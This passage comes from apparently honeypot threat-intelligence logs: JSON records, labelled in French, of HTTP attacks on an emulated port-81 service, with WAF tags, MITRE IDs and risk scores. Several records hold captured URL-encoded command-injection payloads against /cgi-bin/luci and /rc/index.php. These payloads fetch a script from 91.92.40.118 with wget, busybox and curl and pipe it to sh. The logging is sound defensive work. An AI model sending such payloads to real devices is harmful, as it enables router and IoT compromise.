\u0022\/wget.sh%20-O-%7Csh%20-s%20tuoshi%3Bbusybox%20wget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20tuoshi%3Bcurl%20http:\/\/91.92.40.118\/wget.sh%7Csh%20-s%20tuos\u2026\u0022, \u0022request_line\u0022: \u0022GET \/cgi-bin\/luci?cmd=%60cd%20\/tmp%3Bwget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20tuoshi%3Bbusybox%20wget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20tuoshi%3Bcurl%20http:\/\/91.92.40.118\/w\u2026\u0022, \u0022port\u0022: 81, \u0022service\u0022: \u0022http\u0022, \u0022service_label_fr\u0022: \u0022HTTP\u0022}, \u0022evidence_snippet\u0022: \u0022GET \/cgi-bin\/luci?cmd=%60cd%20\/tmp%3Bwget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20tuoshi%3Bbusybox%20wget%20http:\/\/91.92\u0022, \u0022attack_vector\u0022: \u0022config file probe \u00b7 via HTTP:81 \u00b7 (tentative d\u0027exploit) \u00b7 \u2192 \/wget.sh%20-O-%7Csh%20-s%20tuoshi%3Bbusybox%20w\u2026\u0022, \u0022target_port_label\u0022: \u002281 \u00b7 HTTP\u0022, \u0022emulator_service\u0022: \u0022http\u0022, \u0022confidence_reason\u0022: \u0022Confiance 100 % \u2014 9 tag(s) WAF\u0022, \u0022site_display\u0022: {\u0022classification\u0022: null, \u0022classification_reason\u0022: \u0022Sonde fichier sensible: chemin sensible (tag interne) \u00b7 R\u00e8gle WAF \u00ab lfi-12 \u00bb \u00b7 Sonde fichier sensible \/ config \u00b7 confiance 100%\u0022, \u0022classification_reason_label_fr\u0022: \u0022Sonde fichier sensible: chemin sensible (tag interne) \u00b7 R\u00e8gle WAF \u00ab lfi-12 \u00bb \u00b7 Sonde fichier sensible \/ config \u00b7 confiance 100%\u0022, \u0022executive_one_liner_fr\u0022: \u0022Activit\u00e9 suspecte \u2014 risque 64\/100 (Moyen) \u2014 MITRE T1083 \u2014 confiance 100 % \u2014 via HTTP\u0022, \u0022confidence_pct\u0022: 100, \u0022confidence_breakdown\u0022: {\u0022waf\u0022: 100.0, \u0022classification\u0022: 74.0, \u0022behavior\u0022: 0.0, \u0022geo\u0022: 0.0, \u0022protocol\u0022: 43.0, \u0022novelty\u0022: 30.0, \u0022risk_score\u0022: 64}, \u0022attack_stage\u0022: \u0022exploit_attempt\u0022, \u0022attack_stage_label\u0022: \u0022Tentative d\u0027exploit\u0022, \u0022attack_chain_stage\u0022: \u0022exploitation\u0022, \u0022attack_chain_stage_label_fr\u0022: \u0022Exploitation\u0022, \u0022risk_score\u0022: 64, \u0022risk_label\u0022: \u0022Moyen\u0022, \u0022service_name\u0022: \u0022http\u0022, \u0022service_label_fr\u0022: \u0022HTTP\u0022, \u0022dst_port\u0022: 81, \u0022protocol_emulated\u0022: true, \u0022tags_summary\u0022: [\u0022INT-http_sensitive\u0022, \u0022INT-upstream\u0022, \u0022INT-waf-score\u0022], \u0022tags_summary_labels_fr\u0022: [\u0022Http Sensitive\u0022, \u0022Upstream\u0022, \u0022Waf Score\u0022], \u0022recommended_action\u0022: \u0022investigate\u0022, \u0022recommended_action_label\u0022: \u0022Investiguer\u0022, \u0022mitre\u0022: \u0022T1083\u0022, \u0022mitre_technique\u0022: \u0022T1083\u0022, \u0022persona_hostname\u0022: \u0022mail.sensor-1.internal\u0022, \u0022persona_service_banner\u0022: \u0022honeypot-http\u0022, \u0022correlation_flags\u0022: null, \u0022correlation_flags_labels_fr\u0022: null, \u0022sensor_role\u0022: \u0022threat_intelligence\u0022, \u0022sensor_role_label_fr\u0022: \u0022Renseignement menaces\u0022, \u0022confidence_hint_fr\u0022: null, \u0022protocol_details\u0022: {\u0022http_method\u0022: \u0022GET\u0022, \u0022http_path\u0022: \u0022\/wget.sh%20-O-%7Csh%20-s%20tuoshi%3Bbusybox%20wget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20tuoshi%3Bcurl%20http:\/\/91.92.40.118\/wget.sh%7Csh%20-s%20tuos\u2026\u0022, \u0022request_line\u0022: \u0022GET \/cgi-bin\/luci?cmd=%60cd%20\/tmp%3Bwget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20tuoshi%3Bbusybox%20wget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20tuoshi%3Bcurl%20http:\/\/91.92.40.118\/w\u2026\u0022, \u0022port\u0022: 81, \u0022service\u0022: \u0022http\u0022, \u0022service_label_fr\u0022: \u0022HTTP\u0022}, \u0022attack_vector\u0022: \u0022config file probe \u00b7 via HTTP:81 \u00b7 (tentative d\u0027exploit) \u00b7 \u2192 \/wget.sh%20-O-%7Csh%20-s%20tuoshi%3Bbusybox%20w\u2026\u0022, \u0022evidence_snippet\u0022: \u0022GET \/cgi-bin\/luci?cmd=%60cd%20\/tmp%3Bwget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20tuoshi%3Bbusybox%20wget%20http:\/\/91.92\u0022, \u0022target_port_label\u0022: \u002281 \u00b7 HTTP\u0022, \u0022emulator_service\u0022: \u0022http\u0022, \u0022confidence_reason\u0022: \u0022Confiance 100 % \u2014 9 tag(s) WAF\u0022, \u0022confidence_factors_fr\u0022: \u0022Confiance 100 % \u2014 Score WAF 100 \u00b7 9 tag(s) WAF\u0022, \u0022campaign_hint_fr\u0022: null, \u0022attack_phases_timeline_fr\u0022: [{\u0022key\u0022: \u0022recon\u0022, \u0022label_fr\u0022: \u0022Reconnaissance\u0022, \u0022active\u0022: false, \u0022kind\u0022: \u0022stage\u0022}, {\u0022key\u0022: \u0022probe\u0022, \u0022label_fr\u0022: \u0022Sonde \/ probe\u0022, \u0022active\u0022: false, \u0022kind\u0022: \u0022stage\u0022}, {\u0022key\u0022: \u0022exploit_attempt\u0022, \u0022label_fr\u0022: \u0022Tentative d\u0027exploit\u0022, \u0022active\u0022: true, \u0022kind\u0022: \u0022stage\u0022}, {\u0022key\u0022: \u0022post_exploit\u0022, \u0022label_fr\u0022: \u0022Post-exploitation\u0022, \u0022active\u0022: false, \u0022kind\u0022: \u0022stage\u0022}, {\u0022key\u0022: \u0022c2\u0022, \u0022label_fr\u0022: \u0022Commande \u0026 contr\u00f4le\u0022, \u0022active\u0022: false, \u0022kind\u0022: \u0022stage\u0022}, {\u0022key\u0022: \u0022exploitation\u0022, \u0022label_fr\u0022: \u0022Exploitation\u0022, \u0022active\u0022: true, \u0022kind\u0022: \u0022chain\u0022, \u0022hint_fr\u0022: null}]}, \u0022meta_truncated\u0022: true, \u0022honeypot_persona\u0022: {\u0022sensor_id\u0022: \u0022sensor-1\u0022, \u0022hostname\u0022: \u0022mail.sensor-1.internal\u0022, \u0022mail_host\u0022: \u0022mail.sensor-1.internal\u0022, \u0022ldap_dc\u0022: \u0022dc.sensor-1.internal\u0022, \u0022k8s_cluster\u0022: \u0022hp-sensor-1\u0022, \u0022domain\u0022: \u0022sensor-1.internal\u0022, \u0022service_role\u0022: \u0022http\u0022, \u0022service_banner\u0022: \u0022honeypot-http\u0022, \u0022service_os\u0022: \u0022linux\u0022, \u0022dst_port\u0022: \u002281\u0022}, \u0022hostname\u0022: \u0022mail.sensor-1.internal\u0022, \u0022sensor_id\u0022: \u0022sensor-1\u0022, \u0022attack_chain_stage\u0022: \u0022exploitation\u0022, \u0022ban_policy\u0022: \u0022advisory_investigate\u0022, \u0022tags_list\u0022: [\u0022950309:lfi-12\u0022, \u0022950325:rce-0\u0022, \u0022950333:rce-2\u0022, \u0022950345:rce-5\u0022, \u0022950405:ssrf-3\u0022, \u0022950468:nosqli-3\u0022, \u0022950469:nosqli-3\u0022, \u0022950487:redir-1\u0022, \u0022950629:webshell-param-cmd\u0022, \u0022anomaly:high-entropy-query\u0022, \u0022http_no_ua\u0022, \u0022http_probe_cgi_bin\u0022, \u0022http_scanner_params\u0022, \u0022http_sensitive_path\u0022, \u0022http_suspicious_params\u0022, \u0022iot_http_endpoint\u0022, \u0022net_web_probe\u0022]}","tls_sni":null,"tls_ja3_hash":null,"tls_ja3":null,"http_version":"HTTP\/1.1","http_host":"62.3.50.33:81","http_user_agent":null,"http_referer":null,"tags":"[\u0022950309:lfi-12\u0022, \u0022950325:rce-0\u0022, \u0022950333:rce-2\u0022, \u0022950345:rce-5\u0022, \u0022950405:ssrf-3\u0022, \u0022950468:nosqli-3\u0022, \u0022950469:nosqli-3\u0022, \u0022950487:redir-1\u0022, \u0022950629:webshell-param-cmd\u0022, \u0022anomaly:high-entropy-query\u0022, \u0022http_no_ua\u0022, \u0022http_probe_cgi_bin\u0022, \u0022http_scanner_params\u0022, \u0022http_sensitive_path\u0022, \u0022http_suspicious_params\u0022, \u0022iot_http_endpoint\u0022, \u0022net_web_probe\u0022]","anomalies":"[\u0022high-entropy-query\u0022]","severity":10,"bytes_in":280},{"id":11860768,"ip":"45.156.87.213","ts":"2026-07-14 08:22:34.000000","proto":"tcp","src_port":59906,"dst_port":81,"service":"http","classification":"lfi_path_traversal","waf_score":62,"waf_tags":"[\u0022950309:lfi-12\u0022, \u0022950316:lfi-14\u0022, \u0022950325:rce-0\u0022, \u0022950333:rce-2\u0022, \u0022950345:rce-5\u0022, \u0022950405:ssrf-3\u0022, \u0022950468:nosqli-3\u0022, \u0022950469:nosqli-3\u0022, \u0022950487:redir-1\u0022]","http_method":"GET","http_target":"\/rc\/index.php?param=%60cd%20\/tmp%3Bwget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20mdomo%3Bbusybox%20wget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20mdomo%3Bcurl%20http:\/\/91.92.40.118\/wget.sh%7Csh%20-s%20mdomo%60","sensor_id":"paris-1","meta":"{\u0022protocol_emulated\u0022: true, \u0022emulator_response\u0022: \u0022485454502f312e3120323030204f4b0d0a5365727665723a204170616368652f322e342e35370d0a436f6e74656e742d4c656e6774683a20320d0a436f6e6e656374696f6e3a20636c6f73650d0a0d0a4f4b\u0022, \u0022emulator_response_len\u0022: 82, \u0022http_header_count\u0022: 2, \u0022http_query_params\u0022: 1, \u0022http_path_depth\u0022: 2, \u0022http_path_ext\u0022: \u0022php\u0022, \u0022http_ua_hash\u0022: null, \u0022http_host_hash\u0022: \u0022f257870e26046e30cbd03e9d5726ca53aa58b86f\u0022, \u0022http_target_hash\u0022: \u00227e22b17fd10c899591a6e595d6e525197585beb9\u0022, \u0022http_referer_hash\u0022: null, \u0022http_method\u0022: \u0022GET\u0022, \u0022http_ua_is_cli\u0022: false, \u0022http_ua_is_browser\u0022: false, \u0022bytes_in\u0022: 279, \u0022payload_entropy\u0022: 5.101024465647677, \u0022port_category\u0022: \u0022well_known\u0022, \u0022org\u0022: \u0022TechTies Inc.\u0022, \u0022service\u0022: \u0022http\u0022, \u0022app_proto\u0022: \u0022http\u0022, \u0022asn\u0022: 197170, \u0022country\u0022: \u0022NL\u0022, \u0022dst_port\u0022: 81, \u0022risk_waf\u0022: 100.0, \u0022risk_classification\u0022: 78.0, \u0022risk_behavior\u0022: 0.0, \u0022risk_geo\u0022: 0.0, \u0022risk_protocol\u0022: 43.0, \u0022risk_novelty\u0022: 30.0, \u0022risk_boost\u0022: 0, \u0022risk_granularity\u0022: 6.0, \u0022risk_breakdown\u0022: {\u0022waf\u0022: 100.0, \u0022classification\u0022: 78.0, \u0022behavior\u0022: 0.0, \u0022geo\u0022: 0.0, \u0022protocol\u0022: 43.0, \u0022novelty\u0022: 30.0}, \u0022risk_score\u0022: 65, \u0022tag_count\u0022: 12, \u0022anomaly_count\u0022: 1, \u0022campaign_key\u0022: \u0022736c71fac36ddd4c60b2a796be6f829b24c7bca6\u0022, \u0022event_fingerprint\u0022: \u0022db06de03a60901cdd28e69dcd344242e82cf3f34\u0022, \u0022classification_reason\u0022: \u0022Type \u00ab lfi_path_traversal \u00bb (signaux protocolaires) \u00b7 confiance 100%\u0022, \u0022confidence\u0022: 1.0, \u0022classification_confidence\u0022: 1.0, \u0022precision_score\u0022: 140, \u0022precision_signals\u0022: [\u0022CRS-930100-sub\u0022], \u0022kb_rule_ids\u0022: [\u0022CRS-930100-sub\u0022], \u0022matched_patterns\u0022: [\u0022pat-0103\u0022], \u0022matched_pattern_names\u0022: [\u0022LFI Double-dot bypass\u0022], \u0022pattern_ids\u0022: [\u0022pat-0103\u0022], \u0022confidence_breakdown\u0022: {\u0022waf\u0022: 100.0, \u0022classification\u0022: 78.0, \u0022behavior\u0022: 0.0, \u0022geo\u0022: 0.0, \u0022protocol\u0022: 43.0, \u0022novelty\u0022: 30.0, \u0022risk_score\u0022: 65}, \u0022named_classification_skipped\u0022: false, \u0022classification_parent\u0022: \u0022path_traversal\u0022, \u0022service_name\u0022: \u0022http\u0022, \u0022risk_confidence_factor\u0022: 100.0, \u0022city\u0022: null, \u0022is_datacenter\u0022: false, \u0022is_tor_hint\u0022: false, \u0022geo\u0022: {\u0022country\u0022: \u0022NL\u0022, \u0022asn\u0022: 197170, \u0022org\u0022: \u0022TechTies Inc.\u0022, \u0022is_datacenter\u0022: false, \u0022is_tor_hint\u0022: false}, \u0022fingerprint\u0022: {\u0022payload_hash\u0022: \u00227587f457bef25d1317abc49c8baf873f\u0022, \u0022path_pattern_hash\u0022: \u00229f01d15dbd2a6d5aaea97c773f4d76a0\u0022}, \u0022target_context\u0022: {\u0022dst_port\u0022: 81, \u0022service\u0022: \u0022http\u0022, \u0022service_name\u0022: \u0022http\u0022, \u0022risk_score\u0022: 65}, \u0022method\u0022: \u0022GET\u0022, \u0022path\u0022: \u0022\/wget.sh%20-O-%7Csh%20-s%20mdomo%3Bbusybox%20wget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20mdomo%3Bcurl%20http:\/\/91.92.40.118\/wget.sh%7Csh%20-s%20mdomo%60\u0022, \u0022query_string\u0022: \u0022param=%60cd%20\/tmp%3Bwget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20mdomo%3Bbusybox%20wget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20mdomo%3Bcurl%20http:\/\/91.92.40.118\/wget.sh%7Csh%20-s%20mdomo%60\u0022, \u0022waf_tags\u0022: [\u0022950309:lfi-12\u0022, \u0022950316:lfi-14\u0022, \u0022950325:rce-0\u0022, \u0022950333:rce-2\u0022, \u0022950345:rce-5\u0022, \u0022950405:ssrf-3\u0022, \u0022950468:nosqli-3\u0022, \u0022950469:nosqli-3\u0022, \u0022950487:redir-1\u0022], \u0022waf_rule_names\u0022: [\u0022lfi-12\u0022, \u0022lfi-14\u0022, \u0022rce-0\u0022, \u0022rce-2\u0022, \u0022rce-5\u0022, \u0022ssrf-3\u0022, \u0022nosqli-3\u0022, \u0022redir-1\u0022], \u0022request_line\u0022: \u0022GET \/rc\/index.php?param=%60cd%20\/tmp%3Bwget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20mdomo%3Bbusybox%20wget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20mdomo%3Bcurl%20http:\/\/91.92.40.118\/wget.sh%7Csh%20-s%20mdomo%60 HTTP\/1.1\u0022, \u0022payload_snippet\u0022: \u0022GET \/rc\/index.php?param=%60cd%20\/tmp%3Bwget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20mdomo%3Bbusybox%20wget%20http:\/\/91.9\u0022, \u0022evidence\u0022: {\u0022method\u0022: \u0022GET\u0022, \u0022path\u0022: \u0022\/wget.sh%20-O-%7Csh%20-s%20mdomo%3Bbusybox%20wget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20mdomo%3Bcurl%20http:\/\/91.92.40.118\/wget.sh%7Csh%20-s%20mdomo%60\u0022, \u0022query_string\u0022: \u0022param=%60cd%20\/tmp%3Bwget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20mdomo%3Bbusybox%20wget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20mdomo%3Bcurl%20http:\/\/91.92.40.118\/wget.sh%7Csh%20-s%20mdomo%60\u0022, \u0022waf_tags\u0022: [\u0022950309:lfi-12\u0022, \u0022950316:lfi-14\u0022, \u0022950325:rce-0\u0022, \u0022950333:rce-2\u0022, \u0022950345:rce-5\u0022, \u0022950405:ssrf-3\u0022, \u0022950468:nosqli-3\u0022, \u0022950469:nosqli-3\u0022, \u0022950487:redir-1\u0022], \u0022waf_rule_names\u0022: [\u0022lfi-12\u0022, \u0022lfi-14\u0022, \u0022rce-0\u0022, \u0022rce-2\u0022, \u0022rce-5\u0022, \u0022ssrf-3\u0022, \u0022nosqli-3\u0022, \u0022redir-1\u0022], \u0022request_line\u0022: \u0022GET \/rc\/index.php?param=%60cd%20\/tmp%3Bwget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20mdomo%3Bbusybox%20wget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20mdomo%3Bcurl%20http:\/\/91.92.40.118\/wget.sh%7Csh%20-s%20mdomo%60 HTTP\/1.1\u0022, \u0022request_sample\u0022: \u0022GET \/rc\/index.php?param=%60cd%20\/tmp%3Bwget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20mdomo%3Bbusybox%20wget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20mdomo%3Bcurl%20http:\/\/91.92.40.118\/wget.sh%7Csh%20-s%20mdomo%60 HTTP\/1.1\\r\\nHost: 62.3.50.33:81\u0022, \u0022payload_snippet\u0022: \u0022GET \/rc\/index.php?param=%60cd%20\/tmp%3Bwget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20mdomo%3Bbusybox%20wget%20http:\/\/91.9\u0022, \u0022classification_reason\u0022: \u0022Type \u00ab lfi_path_traversal \u00bb (signaux protocolaires) \u00b7 confiance 100%\u0022}, \u0022attack_stage\u0022: \u0022exploit_attempt\u0022, \u0022mitre_tactics\u0022: [\u0022TA0001\u0022, \u0022TA0002\u0022], \u0022mitre_techniques\u0022: [\u0022T1083\u0022], \u0022mitre\u0022: \u0022T1083\u0022, \u0022threat_family\u0022: [\u0022path_traversal\u0022], \u0022recommended_client_action\u0022: \u0022investigate\u0022, \u0022policy_mode\u0022: \u0022intelligence\u0022, \u0022sensor_role\u0022: \u0022threat_intelligence\u0022, \u0022event_signature\u0022: \u0022d02cf7d49a716abb150640ed6b0168916571ad6e\u0022, \u0022protocol_details\u0022: {\u0022http_method\u0022: \u0022GET\u0022, \u0022http_path\u0022: \u0022\/wget.sh%20-O-%7Csh%20-s%20mdomo%3Bbusybox%20wget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20mdomo%3Bcurl%20http:\/\/91.92.40.118\/wget.sh%7Csh%20-s%20mdomo%\u2026\u0022, \u0022request_line\u0022: \u0022GET \/rc\/index.php?param=%60cd%20\/tmp%3Bwget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20mdomo%3Bbusybox%20wget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20mdomo%3Bcurl%20http:\/\/91.92.40.118\/w\u2026\u0022, \u0022port\u0022: 81, \u0022service\u0022: \u0022http\u0022, \u0022service_label_fr\u0022: \u0022HTTP\u0022}, \u0022evidence_snippet\u0022: \u0022GET \/rc\/index.php?param=%60cd%20\/tmp%3Bwget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20mdomo%3Bbusybox%20wget%20http:\/\/91.9\u0022, \u0022attack_vector\u0022: \u0022lfi path traversal \u00b7 via HTTP:81 \u00b7 (tentative d\u0027exploit) \u00b7 \u2192 \/wget.sh%20-O-%7Csh%20-s%20mdomo%3Bbusybox%20wg\u2026\u0022, \u0022target_port_label\u0022: \u002281 \u00b7 HTTP\u0022, \u0022emulator_service\u0022: \u0022http\u0022, \u0022confidence_reason\u0022: \u0022Confiance 100 % \u2014 9 tag(s) WAF\u0022, \u0022site_display\u0022: {\u0022classification\u0022: null, \u0022classification_reason\u0022: \u0022Type \u00ab lfi_path_traversal \u00bb (signaux protocolaires) \u00b7 confiance 100%\u0022, \u0022classification_reason_label_fr\u0022: \u0022Type \u00ab lfi_path_traversal \u00bb (signaux protocolaires) \u00b7 confiance 100%\u0022, \u0022executive_one_liner_fr\u0022: \u0022Activit\u00e9 suspecte \u2014 risque 65\/100 (\u00c9lev\u00e9) \u2014 MITRE T1083 \u2014 confiance 100 % \u2014 via HTTP\u0022, \u0022confidence_pct\u0022: 100, \u0022confidence_breakdown\u0022: {\u0022waf\u0022: 100.0, \u0022classification\u0022: 78.0, \u0022behavior\u0022: 0.0, \u0022geo\u0022: 0.0, \u0022protocol\u0022: 43.0, \u0022novelty\u0022: 30.0, \u0022risk_score\u0022: 65}, \u0022attack_stage\u0022: \u0022exploit_attempt\u0022, \u0022attack_stage_label\u0022: \u0022Tentative d\u0027exploit\u0022, \u0022attack_chain_stage\u0022: \u0022exploitation\u0022, \u0022attack_chain_stage_label_fr\u0022: \u0022Exploitation\u0022, \u0022risk_score\u0022: 65, \u0022risk_label\u0022: \u0022\u00c9lev\u00e9\u0022, \u0022service_name\u0022: \u0022http\u0022, \u0022service_label_fr\u0022: \u0022HTTP\u0022, \u0022dst_port\u0022: 81, \u0022protocol_emulated\u0022: true, \u0022tags_summary\u0022: [\u0022CRS-930100-sub\u0022], \u0022tags_summary_labels_fr\u0022: [\u0022CRS-930100-sub\u0022], \u0022recommended_action\u0022: \u0022investigate\u0022, \u0022recommended_action_label\u0022: \u0022Investiguer\u0022, \u0022mitre\u0022: \u0022T1083\u0022, \u0022mitre_technique\u0022: \u0022T1083\u0022, \u0022persona_hostname\u0022: \u0022mail.sensor-1.internal\u0022, \u0022persona_service_banner\u0022: \u0022honeypot-http\u0022, \u0022correlation_flags\u0022: null, \u0022correlation_flags_labels_fr\u0022: null, \u0022sensor_role\u0022: \u0022threat_intelligence\u0022, \u0022sensor_role_label_fr\u0022: \u0022Renseignement menaces\u0022, \u0022confidence_hint_fr\u0022: null, \u0022protocol_details\u0022: {\u0022http_method\u0022: \u0022GET\u0022, \u0022http_path\u0022: \u0022\/wget.sh%20-O-%7Csh%20-s%20mdomo%3Bbusybox%20wget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20mdomo%3Bcurl%20http:\/\/91.92.40.118\/wget.sh%7Csh%20-s%20mdomo%\u2026\u0022, \u0022request_line\u0022: \u0022GET \/rc\/index.php?param=%60cd%20\/tmp%3Bwget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20mdomo%3Bbusybox%20wget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20mdomo%3Bcurl%20http:\/\/91.92.40.118\/w\u2026\u0022, \u0022port\u0022: 81, \u0022service\u0022: \u0022http\u0022, \u0022service_label_fr\u0022: \u0022HTTP\u0022}, \u0022attack_vector\u0022: \u0022lfi path traversal \u00b7 via HTTP:81 \u00b7 (tentative d\u0027exploit) \u00b7 \u2192 \/wget.sh%20-O-%7Csh%20-s%20mdomo%3Bbusybox%20wg\u2026\u0022, \u0022evidence_snippet\u0022: \u0022GET \/rc\/index.php?param=%60cd%20\/tmp%3Bwget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20mdomo%3Bbusybox%20wget%20http:\/\/91.9\u0022, \u0022target_port_label\u0022: \u002281 \u00b7 HTTP\u0022, \u0022emulator_service\u0022: \u0022http\u0022, \u0022confidence_reason\u0022: \u0022Confiance 100 % \u2014 9 tag(s) WAF\u0022, \u0022confidence_factors_fr\u0022: \u0022Confiance 100 % \u2014 Score WAF 100 \u00b7 9 tag(s) WAF\u0022, \u0022campaign_hint_fr\u0022: null, \u0022attack_phases_timeline_fr\u0022: [{\u0022key\u0022: \u0022recon\u0022, \u0022label_fr\u0022: \u0022Reconnaissance\u0022, \u0022active\u0022: false, \u0022kind\u0022: \u0022stage\u0022}, {\u0022key\u0022: \u0022probe\u0022, \u0022label_fr\u0022: \u0022Sonde \/ probe\u0022, \u0022active\u0022: false, \u0022kind\u0022: \u0022stage\u0022}, {\u0022key\u0022: \u0022exploit_attempt\u0022, \u0022label_fr\u0022: \u0022Tentative d\u0027exploit\u0022, \u0022active\u0022: true, \u0022kind\u0022: \u0022stage\u0022}, {\u0022key\u0022: \u0022post_exploit\u0022, \u0022label_fr\u0022: \u0022Post-exploitation\u0022, \u0022active\u0022: false, \u0022kind\u0022: \u0022stage\u0022}, {\u0022key\u0022: \u0022c2\u0022, \u0022label_fr\u0022: \u0022Commande \u0026 contr\u00f4le\u0022, \u0022active\u0022: false, \u0022kind\u0022: \u0022stage\u0022}, {\u0022key\u0022: \u0022exploitation\u0022, \u0022label_fr\u0022: \u0022Exploitation\u0022, \u0022active\u0022: true, \u0022kind\u0022: \u0022chain\u0022, \u0022hint_fr\u0022: null}]}, \u0022meta_truncated\u0022: true, \u0022honeypot_persona\u0022: {\u0022sensor_id\u0022: \u0022sensor-1\u0022, \u0022hostname\u0022: \u0022mail.sensor-1.internal\u0022, \u0022mail_host\u0022: \u0022mail.sensor-1.internal\u0022, \u0022ldap_dc\u0022: \u0022dc.sensor-1.internal\u0022, \u0022k8s_cluster\u0022: \u0022hp-sensor-1\u0022, \u0022domain\u0022: \u0022sensor-1.internal\u0022, \u0022service_role\u0022: \u0022http\u0022, \u0022service_banner\u0022: \u0022honeypot-http\u0022, \u0022service_os\u0022: \u0022linux\u0022, \u0022dst_port\u0022: \u002281\u0022}, \u0022hostname\u0022: \u0022mail.sensor-1.internal\u0022, \u0022sensor_id\u0022: \u0022sensor-1\u0022, \u0022attack_chain_stage\u0022: \u0022exploitation\u0022, \u0022ban_policy\u0022: \u0022advisory_investigate\u0022, \u0022tags_list\u0022: [\u0022950309:lfi-12\u0022, \u0022950316:lfi-14\u0022, \u0022950325:rce-0\u0022, \u0022950333:rce-2\u0022, \u0022950345:rce-5\u0022, \u0022950405:ssrf-3\u0022, \u0022950468:nosqli-3\u0022, \u0022950469:nosqli-3\u0022, \u0022950487:redir-1\u0022, \u0022anomaly:high-entropy-query\u0022, \u0022http_no_ua\u0022, \u0022net_web_probe\u0022]}","tls_sni":null,"tls_ja3_hash":null,"tls_ja3":null,"http_version":"HTTP\/1.1","http_host":"62.3.50.33:81","http_user_agent":null,"http_referer":null,"tags":"[\u0022950309:lfi-12\u0022, \u0022950316:lfi-14\u0022, \u0022950325:rce-0\u0022, \u0022950333:rce-2\u0022, \u0022950345:rce-5\u0022, \u0022950405:ssrf-3\u0022, \u0022950468:nosqli-3\u0022, \u0022950469:nosqli-3\u0022, \u0022950487:redir-1\u0022, \u0022anomaly:high-entropy-query\u0022, \u0022http_no_ua\u0022, \u0022net_web_probe\u0022]","anomalies":"[\u0022high-entropy-query\u0022]","severity":10,"bytes_in":279},{"id":11860769,"ip":"45.156.87.213","ts":"2026-07-14 08:22:34.000000","proto":"tcp","src_port":59908,"dst_port":81,"service":"http","classification":"cmd_injection","waf_score":51,"waf_tags":"[\u0022950311:lfi-12\u0022, \u0022950327:rce-0\u0022, \u0022950335:rce-2\u0022, \u0022950347:rce-5\u0022, \u0022950407:ssrf-3\u0022, \u0022950468:nosqli-3\u0022, \u0022950471:nosqli-3\u0022, \u0022950600:k8s-api\u0022]","http_method":"POST","http_target":"\/api\/tunnel\/tailscale-install","sensor_id":"paris-1","meta":"{\u0022protocol_emulated\u0022: true, \u0022emulator_response\u0022: \u0022485454502f312e3120323030204f4b0d0a5365727665723a204170616368652f322e342e35370d0a436f6e74656e742d4c656e6774683a20320d0a436f6e6e656374696f6e3a20636c6f73650d0a0d0a4f4b\u0022, \u0022emulator_response_len\u0022: 82, \u0022http_header_count\u0022: 4, \u0022http_query_params\u0022: 0, \u0022http_path_depth\u0022: 3, \u0022http_path_ext\u0022: null, \u0022http_ua_hash\u0022: null, \u0022http_host_hash\u0022: \u0022f257870e26046e30cbd03e9d5726ca53aa58b86f\u0022, \u0022http_target_hash\u0022: \u002271635acf52f08ec22ba63b1a86f3789b430e80ee\u0022, \u0022http_referer_hash\u0022: null, \u0022http_method\u0022: \u0022POST\u0022, \u0022http_ua_is_cli\u0022: false, \u0022http_ua_is_browser\u0022: false, \u0022bytes_in\u0022: 316, \u0022payload_entropy\u0022: 5.1792315319696085, \u0022port_category\u0022: \u0022well_known\u0022, \u0022org\u0022: \u0022TechTies Inc.\u0022, \u0022service\u0022: \u0022http\u0022, \u0022app_proto\u0022: \u0022http\u0022, \u0022asn\u0022: 197170, \u0022country\u0022: \u0022NL\u0022, \u0022dst_port\u0022: 81, \u0022risk_waf\u0022: 100.0, \u0022risk_classification\u0022: 85.0, \u0022risk_behavior\u0022: 0.0, \u0022risk_geo\u0022: 0.0, \u0022risk_protocol\u0022: 43.0, \u0022risk_novelty\u0022: 25.0, \u0022risk_boost\u0022: 15, \u0022risk_granularity\u0022: 6.0, \u0022risk_breakdown\u0022: {\u0022waf\u0022: 100.0, \u0022classification\u0022: 85.0, \u0022behavior\u0022: 0.0, \u0022geo\u0022: 0.0, \u0022protocol\u0022: 43.0, \u0022novelty\u0022: 25.0}, \u0022risk_score\u0022: 81, \u0022tag_count\u0022: 15, \u0022anomaly_count\u0022: 0, \u0022campaign_key\u0022: \u00222d4dce37c5f6688aa6e5ffda2ef0c69f991d8c7e\u0022, \u0022event_fingerprint\u0022: \u00221722445cc46ca3957e756f36c81932a8aaa6e177\u0022, \u0022classification_reason\u0022: \u0022Injection de commande (tag 